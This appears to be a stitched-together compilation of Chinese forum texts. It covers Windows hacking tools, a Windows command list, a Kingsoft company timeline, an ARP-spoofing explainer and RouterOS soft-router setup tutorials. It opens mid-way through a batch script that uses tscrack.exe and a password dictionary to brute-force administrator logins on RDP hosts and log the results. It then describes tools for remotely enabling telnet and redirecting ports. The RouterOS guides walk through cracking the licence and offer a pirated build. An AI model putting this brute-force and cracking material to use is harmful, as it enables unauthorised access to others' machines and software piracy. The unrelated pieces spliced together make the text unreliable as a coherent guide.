pass.dic >>rouji.txt :noscan @echo tscrack.exe no find or scan faild (②存为hack.bat) (运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、 pass.dic与tscrack.exe在同一个目录下；就可以等待结果了) hack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的 ***istrator密码，并将破解结果保存在rouji.txt文件中。 5、其它： Shutdown.exe Shutdown www.sina.com.cn 当有人扫锚你的80端口时，他扫 到的结果会完全是www.sina.com.cn的主机信息 Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端 口重定向后，就通过88端口发送到目标IP的23端口。（与目标IP建立Telnet时本 机就用的88端口与其相连接）然后：直接Telnet 127.0.0.1（本机IP）就连接到 目标IP的23端口了。 OpenTelnet.exe (远程开启telnet工具) opentelnet.exe www.jz5u.com 63.struct[struct-name]：将文件传输结构设置为struct-name， 缺省时使用 stream结构。 64.sunique：将远程主机文件名存储设置为只一(与runique对应)。 65.system：显示远程主机的操作系统类型。 66.tenex：将文件传输类型设置为TENEX机的所需的类型。 67.tick：设置传输时的字节计数器。 68.trace：设置包跟踪。 69.type[type-name]：设置文件传输类型为type-name，缺省为ascii，如:type binary，设置二进制传输方式。 70.umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask 3 71.user user-name[password][account]：向远程主机表明自己的身份，需要口 令时，必须输入口令，如：user anonymous my@email。 72.verbose：同命令行的-v参数，即设置详尽报告方式，ftp 服务器的所有响 应 都将显示给用户，缺省为on. 73.?[cmd]：同help. #11 十一： 7：计算机运行命令全集 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构 wupdmgr--------windows更新程序 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构 wupdmgr--------windows更新程序 wscript--------windows脚本宿主设置 write----------写字板winmsd-----系统信息 wiaacmgr-------扫描仪和照相机向导 winchat--------XP自带局域网聊天 mem.exe--------显示内存使用情况 Msconfig.exe---系统配置实用程序 mplayer2-------简易widnows media player mspaint--------画图板 mstsc----------远程桌面连接 mplayer2-------媒体播放机 magnify--------放大镜实用程序 mmc------------打开控制台 mobsync--------同步命令 dxdiag---------检查DirectX信息 drwtsn32------ 系统医生 devmgmt.msc--- 设备管理器 dfrg.msc-------磁盘碎片整理程序 diskmgmt.msc---磁盘管理实用程序 dcomcnfg-------打开系统组件服务 ddeshare-------打开DDE共享设置 dvdplay--------DVD播放器 net stop messenger-----停止信使服务 net start messenger----开始信使服务 notepad--------打开记事本 nslookup-------网络管理的工具向导 ntbackup-------系统备份和还原 narrator-------屏幕"讲述人" ntmsmgr.msc----移动存储管理器 ntmsoprq.msc---移动存储管理员操作请求 netstat -an----(TC)命令检查接口 syncapp--------创建一个公文包 sysedit--------系统配置编辑器 sigverif-------文件签名验证程序 sndrec32-------录音机 shrpubw--------创建共享文件夹 secpol.msc-----本地安全策略 syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密 码 services.msc---本地服务设置 Sndvol32-------音量控制程序 sfc.exe--------系统文件检查器 sfc /scannow---windows文件保护 tsshutdn-------60秒倒计时关机命令 tourstart------xp简介（安装完成后出现的漫游xp程序） taskmgr--------任务管理器 eventvwr-------事件查看器 eudcedit-------造字程序 explorer-------打开资源管理器 packager-------对象包装程序 perfmon.msc----计算机性能监测程序 progman--------程序管理器 regedit.exe----注册表 rsop.msc-------组策略结果集 regedt32-------注册表编辑器 rononce -p ----15秒关机 regsvr32 /u *.dll----停止dll文件运行 regsvr32 /u zipfldr.dll------取消ZIP支持 cmd.exe--------CMD命令提示符 chkdsk.exe-----Chkdsk磁盘检查 certmgr.msc----证书管理实用程序 calc-----------启动计算器 charmap--------启动字符映射表 cliconfg-------SQL SERVER 客户端网络实用程序 Clipbrd--------剪贴板查看器 conf-----------启动netmeeting compmgmt.msc---计算机管理 cleanmgr-------**整理 ciadv.msc------索引服务程序 osk------------打开屏幕键盘 odbcad32-------ODBC数据源管理器 oobe/msoobe /a----检查XP是否激活 lusrmgr.msc----本机用户和组 logoff---------注销命令 iexpress-------木马捆绑工具，系统自带 Nslookup-------IP地址侦测器 fsmgmt.msc-----共享文件夹管理器 utilman--------辅助工具管理器 gpedit.msc-----组策略

背景资料：金山软件发展历程一览(表)

1989年	求伯君加入金山，设立深圳开发部。
1994年	成立北京金山软件公司
1996年	发布国内第一款商业游戏《中关村启示录》西山居品牌切入游戏产业
1997年	发布中国第一款RPG游戏《剑侠情缘》；发布著名词典软件《金山词霸》；发布Windows版本的《WPS 97》
1998	联想入股金山，金山重组
2000年	金山公司投资卓越网。《金山毒霸》上市
2002年12月	西山居推出3D动作类游戏《天王》贺岁游戏
2003年4月	发布“技术立业，角逐网络游戏，启航企业业务”战略。筹建金山北京研究院，组建金山数字娱乐有限公司
2003年7月	隆重推出耗资1500万、耗时三年研发的《剑侠情缘网络版》
2004年2月	发布“技术立业 决胜网游 金山公司2004新架构新战略”
2004年10月	正式推出网游新作《封神榜》
2005年4月	《金山毒霸2005安全组合装》正式上市，开创“软件免费、服务有偿”的商业模式
2005年6月	《剑网》登陆越南
2005年9月	金山毒霸强势登陆日本，创中国通用软件公司进入日本市场的先河。金山日本公司成立
2005年9月	金山软件公司正式发布十年来第11款游戏作品《剑侠情缘网络版2》
2005年12月	金山与华义达成战略联盟，全面接管华义在大陆的所有业务
2005年12月	爱词霸网正式运营，基于互联网应用的全新产品-“词霸豆豆”也同时在各权威网站发布
2006年7月	金山宣布结盟火石软件，签约代理Q版网游《水浒Q传》
2006年8月	金山获新加坡GIC、英特尔投资和新宏远创基金注资7200万美元，金山迈入新里程
2006年9月	Kingsoft Office 2007在东京发布，金山WPS国际化战略正式启动，首站登陆日本
2007年	重组公司业务为两大部分：娱乐软件和应用软件

ARP定义

ARP（Address Resolution Protocol，地址解析协议）是一个位于TCP/IP协议栈中的底层协议，负责将某个IP地址解析成对应的MAC地址。

遭受ARP攻击后现象

ARP欺骗木马的中毒现象表现为：使用局域网时会突然掉线，过一段时间后又会恢复正常。比如客户端状态频频变红，用户频繁断网，IE浏览器频繁出错，以及一些常用软件出现故障等。如果局域网中是通过身份认证上网的，会突然出现可认证，但不能上网的现象（无法ping通网关），重启机器或在MS-DOS窗口下运行命令arp -d后，又可恢复上网。

ARP欺骗木马只需成功感染一台电脑，就可能导致整个局域网都无法上网，严重的甚至可能带来整个网络的瘫痪。该木马发作时除了会导致同一局域网内的其他用户上网出现时断时续的现象外，还会窃取用户密码。如盗取QQ密码、盗取各种网络游戏密码和账号去做金钱交易，盗窃网上银行账号来做非法交易活动等，这是木马的惯用伎俩，给用户造成了很大的不便和巨大的经济损失。

ARP攻击原理

ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。

ARP攻击主要是存在于局域网网络中，局域网中若有一个人感染ARP木马，则感染该ARP木马的系统将会试图通过“ARP欺骗”手段截获所在网络内其它计算机的通信信息，并因此造成网内其它计算机的通信故障。

ROS菜鸟篇，教你一步一步成为ROS能手

一：安装 1、光盘版的（转自雨纷飞大哥作品） 将iso文件刻录成可引导光盘。机器的硬盘设置为IDE0，即第一个IDE通道的主盘。 bios设置光盘引导系统，放入光盘启动机器得到如下画面： 点击浏览该文件 选择 2：Install RouteOS 2.8.18后稍等，得到如下画面： 用方向键和空格选择你需要的模组功能后，摁“i“键确定安装。会再次询问你继续？yes or no?，摁“Y“. 然后又问:do you want to keep lod configuraton?你需要保留旧的结构么?摁“N“. 然后开始自动的格式化磁盘、安装核心、安装模组。最后提示： Press ENTER to Reboot，按回车重新启动机器。 点击浏览该文件 重新启动后出现图1的那个引导画面(如果没有出现而直接进了登陆界面说明用硬盘引导了)： 选择3: Crack RouteOS Floppy Disk,开始^^。 ^^过程都是中文的。如果你的硬盘在IDE0:0的话^^是不会有问题的。否则可能出现系统文件被破坏、启动时0123456...循环出现等问题。 问你是否重启呢。把光盘拿出来后按下Y确定重启动 点击浏览该文件 重新启动后开始登陆。初始用户名admin，初始密码为空。 咦？怎么还有提示注册的信息和Soft ID？ 原来是还需要一个命令激活注册补丁才可以哦： 输入命令：/system license import file-name=key 或者缩写为/sy lic i f key 然后提示你是否重新启动。按Y重新启动 此主题相关图片如下： 重新启动并用admin:““登陆后发现，提示注册的信息已经完全消失了，现在是正式版了 此主题相关图片如下： 现在服务器启动起来了，但是还没有任何配置，若想用winbox对其进行控制，则必须激活和配置网卡的ip 掩码等。这里我装了三块网卡，一块接电信，一块接网通，一块路由后接内网交换机。 首先看看三块网卡是否都被识别出来了，命令是： /interface print 可以缩写为 /int pri 以后用缩写不再另外注名。 结果应该如下图： 此主题相关图片如下： 然后我们来激活他们，命令是： ENABLE 0 ENABLE 1 ENABLE 2 0是第一块网卡。 激活后没有提示。用print命令查看后发现网卡前面的X变成R，就代表激活成功了。 如下图 此主题相关图片如下： 但是ether1 ether2之类的名字实在是抽象不便于以后的配置，所以我们把网卡给改个名字： 命令： SET 0 NAME=newname 我这里用 set 0 name=dianxin set 1 name=wangtong set 2 name=neiwang 如下图：改名成功。 此主题相关图片如下： 然后给他们相应的IP。 先返回顶层目录，用/键就可以了。 然后输入： IP ADDRESS add address 192.168.0.10/24 interface dianxin add address 192.168.0.11/24 interface wangtong add address 192.168.0.12/24 interface neiwang 这样就设置好了dianxin、wangtong、内网这三块网卡的IP和子网掩码。24代表255.255.255.0 我只是做实验写教程，具体IP地址还要根据你的实际情况来变动。 添加完毕后可以用print命令来查看结果。如果发现某条有错误，用“remove 错误的编号“既可以删除 此主题相关图片如下： 到这里IP的配置就大功告成了，我们终于可以跟文字界面说拜拜了~ 2、GHOST版的（原创） 将下载好的G文件放在一块带有ghost的虚拟dos（我的是的MAX—dos）系统上，进ghost选择恢复镜像到全盘（千万别错了哦，是全盘镜像）。完毕重启后无需^^，余下的操作同上，我就不重复了。 二：winbox下调试 根据你所设的局域网IP。输入http://192.168.1.1(我的是192.168.1.1) 下载winbox 得到如下图： 此主题相关图片如下： 输入管理员用户admin，默认密码为空，如图： 此主题相关图片如下： 第一项：interfaces。这里可以更改你的网卡名称，查看个内外网总体流量 此主题相关图片如下： 查看外网流量如图：（选择网卡名称第四项traffic） 此主题相关图片如下： 第二项，IP 由于你已经填写好了内外网的IP，所以IP Addresses里无须再管了。注意事项，外网掩码请仔细询问你当地的电信或者网通部门 2、ip routes，这里是更改你所走的网关用的，如图 此主题相关图片如下： 3、IP pool（不管他） 4、IP arp（这里是网卡mac地址与ip地址绑定，我是绑定了），具体操作，双击前面带D（代表未arp绑定）的IP地址，点tools选择copy，点OK，哈哈，前面的D就没啦，恭喜你绑定成功。 此主题相关图片如下： 5、IP vrrp（不管他） 6、IP firewall(重点哦) 到这里了，是不是还拼不通外网啊，哈哈，没有IP伪装啊，当然上不了啊。IP—firewall—source，点加号加一条规则，第一项里面填你的设置的内网网段，不是网关哦，后面跟24，不是32哦。切记！如图 此主题相关图片如下： 能上网了吧，这时候你的软路由非常脆弱，所以，我们来给他增“墙”，本文核心，防火墙配置。 input 设置图： 此主题相关图片如下： 一些重要的端口改变图：为什么要改变端口，用途很明显，默认的大家都知道，而你所改的呢？只有你自己知道，哈哈，这就是效果！ 此主题相关图片如下： 看到没？ 比如telnet啊，winbox啊，upnp，http（这里是指访问你的路由的http端口哦）。 forward 设置，这里控制着你网吧的安全核心，先看图： 此主题相关图片如下： 其本都是drop drop drop。（阻止的意思啦） tcp/udp协议的134—139端口，445端口（把三波引进来的就是这个端口，罪大恶极，封封封！） 500端口（这个端口是别人经常攻击你软路由的端口，也封）还有迅雷5啊，P2P啊，QQ幻想啊（你的是100M光纤就别封了，无所谓） output 设置，此项比较简单，但很重要，syn大家都明白吧。如图： 此主题相关图片如下： virus设置：（也很重要哦）如果你input forward 两项防火没有起到什么作用，可以在里面做个跳转，使之两项转向virus设置。 virus设置图： 此主题相关图片如下： jump(跳转图)： 此主题相关图片如下： 哈哈，防火墙设置基本完成，不要看似简单，记住写规则的顺序：先允许，后拒绝，别说我没讲哦，否则防火墙会被你配的一团糟，你还以为你的路由很安全呢？哈哈。 端口映射： 这项比较简单，IP—firewall—Destination。先看图： 此主题相关图片如下： 此主题相关图片如下： 负载平衡：IP—firewall—connections 点Tracking 看我图设置： 此主题相关图片如下： 刚才有人问我配置怎么样，建议网卡用60元左右的吧，8139嘛最好不要用，路由的流量不小哦。慎用慎用。别的硬件倒无所谓，我想现在硬件也不会差到哪里吧，CPU，内存都是超便宜哦。 至于网卡顺序嘛：以三块网卡为例，以我的为例，从主板显卡这边数，依次为3、2、1。 路由水晶头做法：路由与电信的转发包同一设备，所以，你想想是用哪种接法呢？在这里卖个关子，不说。不能什么都喂给你吃哦，有得时候自己动手，学的更多更深！ 以下是引用BA_alik2008在2005-12-15 7:58:13的发言： 我想知的是。软件稳不稳定。。。。。机子配制要不要很高的。100多台的。 还有。能不能控制内网的每个IP 的下载上传的流量。。。。限制以后。会不会导倒内网打开网页慢的。 我前几天就买了侠诺的路由器。它的只能限制内网的总速度的。不能对每个IP的限制。还有这样整体限制上传下载。 会影响到内网打开网页慢。 楼主我想知道这些的。不知大家有没有测试过的。这些问题得到解决没？ 机器配置要求不高，由于没有128的内存，我用的是256的，由于没有815的板子，我用的845的，由于没有cy1.7的CPU，我用的是2.0的，关键在网卡配置。呵 呵，ROS可以单个IP限速，不过我从来不限，防火墙配置好了，限速干什么呢？限速后玩游戏，网页都很正常。但有人提及过刷浩方问题，由于我不限速，所以，至今没发现。大家要限速的请看下面：Queues项的Simple queue： 此主题相关图片如下： 我的前面都是X，就是没有启用的意思啦，关键时候用一下，哈哈。 以下是引用ztw138138在2005-12-16 11:14:51的发言： ros下怎样用命令关机？ system—shutdown 以下是引用alfried在2005-12-16 19:44:35的发言： 我有个小问题请教以下\! 我想不让192.168.0.12------192.168.0.99这一ip段上网,杂设置?? 具体不详，试用此方法，想上网的机器做ARP绑定，外网也绑定，这样，没有做ARP绑定的机器就上不了网了。 以下是引用8838548在2005-12-16 22:45:55的发言： 能不能进到操作画面在设置网卡IP地址等？一顶要在安装时设置吗 内网IP是一定要设置好的，不然怎么连winbox？你不会来个http://0.0.0.0/吧，连上了winbox，再改啦。 以下是引用逍遥一指令在2005-12-17 11:34:16的发言： 条件允许的情况下肯定首选硬件路由器 软路由再怎么好毕竟不能和硬件路由比,不然大家还有必要花高价购买高性能路由器吗 正如软件防火墙能和硬件防火墙比吗? 建议兄弟先去看看有关软路由和硬路由的文章。 以下是引用zy3680在2005-12-17 14:42:25的发言： 用方向键和空格选择你需要的模组功能 楼主能不能把这些模组功能介绍一下啊,还有一般网吧需要哪些模组 基本已帮你选择好了！

ROS教程

1、安装ROS 除了自己学习和测试用ROS外，最好还是单独用一台机器，相信这也不用多说，安装的时候要注意的是硬盘一定要接在IDE0上面，并且作为主盘MASTER，光驱随便，很多安装之后不能正常启动的都是这个问题、用安装光盘启动后，如图1 图1 选择 i 进入安装界面选择需要安装的package，图2 图2 选择完后，再按i安装，y确定，再按n不保存旧配置。最后回车重新启动，这时进入ROS是未注册的版本，如图4 图4 用光驱启动，在启动菜单按c破解，图5 图5 破解之后进入已经没有了未注册提示。。。见图6 图3 2、服务端配置 /interface pri          能显示出你现在可用的网卡。如图6 图6 /ip address add address=192.168.1.1/24 interface=ether1    设置ether1为内网IP，其中192.168.1.1/24添自己的内网IP ，设置成功没有提示，可以用pri查看 见图7 图7 3、winbox配置（所有配置都在这里进行） 在局域网其他机器IE浏览器192.168.1.1 进入WEBBOX，左边可以下载WINBOX，当然如果你已经有WINBOX可以省略这步。打开WINBOX输入IP和用户名连接（图8） 图8 进入配置界面 (1)点左侧INTERFACE，双击ether1将name改为lan，同样将另两个改为cnc和tel。图9 图9 (2)左侧IP->ADDRESS ,+号,分别设置CNC和TEL的IP地址,添网通和电信给的IP/子网掩码(不要和我的一样...),红*部分是自动添加的.图10 图10 (3)IP->ROUTE,+号添加默认的网关,默认网通就添网通网关，默认电信就添电信的网关，这里默认电信. 如图11,正常下黑圈处为AS,黄圈出为TEL.comment设注释为tel 图11 (4)IP->FIREWALL,NAT选项卡,+号添加chain:srcnat,src.addr:192.168.1.0/24,ACTION选项卡里为masquerade.OK,现在可以通过电信上网了.图12 图12 (5) 上传路由表文件cnc.rsc,如图13 图13 在WINBOX中，NEW TERMINAL,输入import cnc完成.如图14 图14 现在已经可以电信网通自动切换了. (6)只是切换也不太安全,一定要配制一下防火墙么，同5一样,上传防火墙的RSC文件到192.168.1.1,在NEW TERMINAL里执行import firewall,整体和第5步相近. (7)配置的差不多了,该改管理员账号了,左侧USERS,双击ADMIN改个名字和右下脚的password,如果不需要远程修改ROS的话,可以设定访问IP,192.168.1.0/24之类的~~~ 图16 至此,基本OK了. 第一次写教程用了2个多小时呵呵..有什么不完整的地方欢迎大家补充，大家可以从本站下载ROS 2.9.6破解版。也可以直接找我，QQ:273393171 ros软路由======================================================================== 将该硬盘挂在要做路由电脑上，注意必须接在第一个IDE并且是主硬盘接口。插上一张网卡，这是接内网的LAN。 开机，出现登陆提示。用户:admin          密码：空 输入setup再按两次A   在ether1后面输入你的内网IP，如：192.168.0.254/24 （这里/24是24位掩码，与255.255.255.0算法一样） 输入完ip后，按两次x退出，现在可以可以ping通192.168.0.254了，也可用winbox在图形界面下访问路由了。 关机，插上另一张网卡，这个是接外网的，即WAN，现在可以去掉软路由电脑的显示器和键盘了。 开机，运行winbox以admin身份登陆 添加外网网卡。在ip---address里按+，address输入你的外网ip和掩码位，比如218.56.37.11/29。network和BROADCAST不填，INTERFACE里选择ethr2 增加外网网关。ip-routes按+，Destination用默认的0.0.0.0/0 ，Gateway输入外网网关，比如218.56.37.10 实现NAT转发：IP-FIREWALL在NAT里点+，在ACTION里选masquerade 现在该路由已经做好雏形，可以正常上网了。 ROS菜单含义 guanlian interfaces---网络接口 wireless---无线网络 bridge---桥接 ppp-虚拟拨号 ip ports--端口 queues-限速 drivers-设备 system files-文件       备份/恢复 log--系统日志 snmp-snmp管理方式 users-用户 radius-radius管理 tools-工具 new terminal-命令方式 telnet--tlenet连接方式 password--修改密码 certificate---证书 哎，盗版 madk supout.rif 制作rif文件 manual--说明 isdn chanels--一线通方式 routing--路由 exit--退出 ip addr add addr=192.168.1.1/24 interface=ether1 ip addr add addr=58.213.126.58/30 interface=ether2 ip route add gateway=58.213.126.57       外网 ip firewall nat add chain=srcnat src-address=192.168.1.0/24 action=masquerade 222.190.124.46 218。94。132。50天之骄傲 ipipipiipipipipipipipipipipip sys reset __________________________________ addresses--ip地址 routers-路由表 pool-地址池 arp-帮定ip vrrp-热备份 firewall-防火墙 socks-代理 upnp-自动端口映射 traffic flow-网络流量 accounting--合计 services--服务 packing-ros模块 neighbors--邻居ros用户 dns-- proxy-代理 dhcp client-dhcp客户端 dhcp server - dhcp服务 dhcp relay-dhcp转换 hospot-热点认证 telephony-电话 ipsec-ip隧道连接方式 web proxy web代理 system system system system system system --------------------------------------------- identity---ros标示 clock-时间 resources-系统配置 license-注册信息 packages--安装包 auto upgrade-自动升级 logging--日志 history--历史日志 console---com控制台 scripts--脚本 scheduler--进程 watchdog--监视狗 reboot-从起 shutdown-关机 lcd-小液晶显示ros消息 ntp chient--ros时间客户端 ntp server---ros时间服务端 自动更新ros时间 health---ros情况 ups-ups电源，可持续电源，就是电瓶。汗~ tools tools tools tools tools tools -------------------------------------- ping macping 探测mac地址 traceroute---Tracert命令 bandwidth test-宽带测试 btest server--btest服务器 traffic monitor--数据报监视器 packet sniffer--数据报扫描 torch--察看客户机信息 mac server mac 服务器 graphing---曲线图 ip sacan--ip扫描 ping speed--ping 速度 flood ping --ping阻塞 netwatch--网络监视 ================================================================================                Router OS 配置手册 (网吧) 一  初始安装 1 启动后，用用户名：admin  密码空登入 1运行 Setup 2选a ,配制ip和网关 3再选a 添加一个IP地址，这时会询问你哪一个接口，一般是直接回车，再输入一个IP和子网掩码 4现在可以用routerOS自带的专用工具进行设置了.打开IE 输入地址：http://内网IP 5下载左上方的mikrotik winbox consle,输入地址，用户名，密码登入 6先在interface 中 把两个接口改名 wan 和lan 便于辨认，原来的wan 口是灰色的，打上勾启动起来。 7选IP ---address 点+号添加一个Ip,子网掩码用10进制，比如255.255.255.252就是30  （30个1），接口选wan 8 选IP ----Router  点+号添加个路由，在gateway 中输外网网关 9选IP ---Firewall,在source NAT 中加入内网网段，在general 的src address 中输内网网段，多个网段可加多个 在Action 中 选    masquerade ,意思是IP伪装。 到这已经可以正常上网了。 10端口映射在IP---firewall---destinationNAT general 的 dst address 输外网IP 掩码32 端口 协议 。 在Action 中输内网ip 端口，    action 选 nat    11防火墙的设置 在 ip –firewall ---Filter rule 中，有intup （入口） forward (转发) output (出口),网吧一般设置input 和forward就可以了 比如封掉445端口，协议tcp 和udp 都要做，input 和forward 都要做，action 选drop 就是丢弃 限制 bt 下载，在advanced –p2p 中选 bit-torrent ,里面还有其他的p2p软件，看情况设，梦幻西游用的是里面的kazaa 限制下载速度在queues –simple queue ,比如限制ip 为192.168.0.5的机器的下载速度为128k-256k 上传为56k-128k 最后别忘了设置密码：